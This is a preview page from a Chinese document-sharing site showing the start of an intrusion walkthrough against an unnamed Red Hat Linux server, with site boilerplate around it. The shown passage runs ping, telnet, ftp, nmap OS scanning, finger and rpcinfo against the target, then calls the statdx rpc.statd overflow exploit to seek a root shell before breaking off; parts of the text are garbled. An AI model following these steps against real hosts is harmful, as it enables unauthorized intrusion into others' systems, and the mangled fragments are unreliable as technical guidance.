一次曲折的RedHatLinux操作系统入侵.docVIP

  1. 1、本文档共3页,可阅读全部内容。
  2. 2、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
  3. 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  4. 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  5. 5、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  6. 6、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  7. 7、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  8. 8、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
一次曲折的RedHatLinux操作系统入侵.doc

  一次曲折的RedHat Linux操作系统入侵~教育资源库   首先确定目标,假设是:.XXX.   先让俺看看是不是连得上:     C:ping .XXX.   Pinging .XXX.[00] 00: bytes=32 time=541ms TTL=244   Reply from 00: bytes=32 time=620ms TTL=244   Reply from 00: bytes=32 time=651ms TTL=244   Reply from 00: bytes=32 time=511ms TTL=244   Ping statistics for 00:   Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),   Approximate round trip times in milli-seconds:   Minimum = 511ms, Maximum = 651ms, Average = 580ms   嘻嘻不但连得上,速度还不错   先tel看看banner:   C:gt;tel .XXX.   遗失对主机的连接。   再试试ftp,   C:gt;ftp .XXX.      Connected to ..tp on an i686   login: fetdog   Passap扫描器,看看其中的奥妙~~~     bash-2.04$nmap -sT -O .XXX.   Starting nmap V. 2.54BETA7 ( ./nmap/ )   APDIR=. to give priority to files in   irectory   Interesting ports on (.XXX.):   (The 1520 ports scanned but not shotp   79/tcp open finger   80/tcp open http   111/tcp open sunrpc   113/tcp open auth   443/tcp open https   513/tcp open login   514/tcp open shell   515/tcp open printer   587/tcp open submission   1024/tcp open kdm   TCP Sequence Prediction: Class=random positive increments   Difficulty=3247917 (Good luck!)   Remote operating system guess: Linux 2.1.122 - 2.2.16   Nmap run pleted -- 1 IP address (1 host up) scanned in 9 seconds   打开的端口还挺多,这意味着入侵的可能性增加。79/tcp open finger ,先看看这个,不过linux没有finger用户列表这个漏洞。   bash-2.04$finger .XXX.      [.XXX.]      No one logged on.   再看看111/tcp open sunrpc 。近来rpc漏洞风行,不知道RH7这个东东会不会有?先看看再说!     bash-2.04$rpcinfo -p .XXX.    program vers proto port service   100000 2 tcp 111 rpcbind   100000 2 udp 111 rpcbind   100021 1 udp 1024 nlockmgr   100021 3 udp 1024 nlockmgr   100024 1 udp 1025 status   100024 1 tcp 1024 status   看来有rpc.statd服务。来看看能不能远程溢出拿个rootshell。    bash-2.04$./statdx -h   statd 123下一页 友情提醒:,特别!x by ron1n   Usage: stat [-t] [-p port] [-a addr] [-l len]   [-o offset] [-] [-s secs] [-d type]   -t attack a tcp dispatcher [udp]   -p rpc.statd serves requests on [query]   -a the stack address of the buffer is   -l the le

文档评论(0)

ggkkppp + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

1亿VIP精品文档

相关文档